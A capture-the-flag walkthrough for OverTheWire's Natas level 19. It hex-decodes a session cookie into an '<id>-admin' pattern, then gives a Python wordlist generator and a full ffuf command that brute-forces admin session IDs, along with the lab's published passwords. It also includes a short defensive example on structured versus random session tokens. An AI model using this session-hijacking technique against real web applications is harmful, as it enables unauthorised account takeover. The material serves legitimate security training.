Level 18 - Level 19
Username: natas19
Password: 8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s
URL: http://natas19.natas.labs.overthewire.org
Overview
This time we get the same login page as in the last level, and it is clearly mentioned that the source code is almost the same, but the session IDs will be random.

Let's first get the session ID by trying to log in with some random credentials.

Decoding the Cookie
The session ID we got was some random encoded string. I tried to decode the session ID with some basic encoding schemes in CyberChef and was able to decode the string using the From Hex scheme.

The string that we got after decoding is <id>-admin.
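The decoded <id>-admin format means the cookie is only as secret as its numeric ID. The following added example (not part of the original write-up) checks whether a session cookie has this structure and compares its guessing effort with a CSPRNG-generated token. The 640 bound is taken from the wordlist script on this page; the function names and the sample cookie are constructed for illustration.

```python
import math
import re
import secrets

MAX_ID = 640  # assumption: ID range used by the wordlist script on this page
STRUCTURED = re.compile(r"(\d+)-([A-Za-z0-9_]+)")
SAMPLE = "42-admin".encode("utf-8").hex()  # constructed sample cookie value


def decode_session_id(cookie):
    """Return (id, username) if cookie is hex of '<id>-<username>', else None."""
    try:
        text = bytes.fromhex(cookie).decode("ascii")
    except ValueError:  # bad hex or non-ASCII bytes (UnicodeDecodeError is a ValueError)
        return None
    match = STRUCTURED.fullmatch(text)
    return (int(match.group(1)), match.group(2)) if match else None


def effective_bits(cookie):
    """Guessing effort in bits: log2(MAX_ID) if structured, else 4 bits per hex char."""
    if decode_session_id(cookie) is not None:
        return math.log2(MAX_ID)
    # Upper bound that only holds if the token came from a CSPRNG.
    return 4.0 * len(cookie)


def new_session_id():
    """Unpredictable replacement: 128 bits from the OS CSPRNG, no user data embedded."""
    return secrets.token_hex(16)


if __name__ == "__main__":
    for label, cookie in (("structured", SAMPLE), ("random", new_session_id())):
        print(label, cookie, decode_session_id(cookie), round(effective_bits(cookie), 1))
```

A structured cookie scores under 10 bits regardless of how long its hex string looks, while the replacement token carries 128 bits and no user data.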
Brute-forcing Session ID
Since we know all the possible IDs, we can generate a wordlist of all possible <id>-admin session IDs with hex encoding. The wordlist can be generated using the following Python script.
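#!/usr/bin/env python3
# Build one hex-encoded "<id>-admin" candidate per line for IDs 0..640.
cookies = [f"{i}-admin".encode("utf-8").hex() + "\n" for i in range(0, 641)]

# The context manager closes the file even if the write fails.
with open("hex_640.txt", "w") as wordlist:
    wordlist.writelines(cookies)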
Executing the above Python script generates the wordlist.

Now it's time to use ffuf to brute-force the session IDs.
ffuf -w hex_640.txt:FUZZ \
-u $'http://natas19.natas.labs.overthewire.org/index.php' \
-X $'POST' \
-H $'Host: natas19.natas.labs.overthewire.org' \
-H $'Content-Length: 31' -H $'Cache-Control: max-age=0' \
-H $'Authorization: Basic bmF0YXMxOTo4TE1KRWhLRmJNS0lMMm14UUtqdjBhRURkazd6cFQwcw==' \
-H $'Upgrade-Insecure-Requests: 1' \
-H $'Origin: http://natas19.natas.labs.overthewire.org' \
-H $'Content-Type: application/x-www-form-urlencoded' \
-H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36' \
-H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
-H $'Referer: http://natas19.natas.labs.overthewire.org/' \
-H $'Accept-Encoding: gzip, deflate, br' \
-H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H $'Connection: close' \
-b $'PHPSESSID=FUZZ' \
-d $'username=admin&password=somoene' \
-fr "You are logged in as a regular user."
From the results of ffuf, we can get the valid admin cookie.

Getting the Password
Now let's replace the session ID with the ID we found using ffuf and refresh the page to get the credentials for the next level.
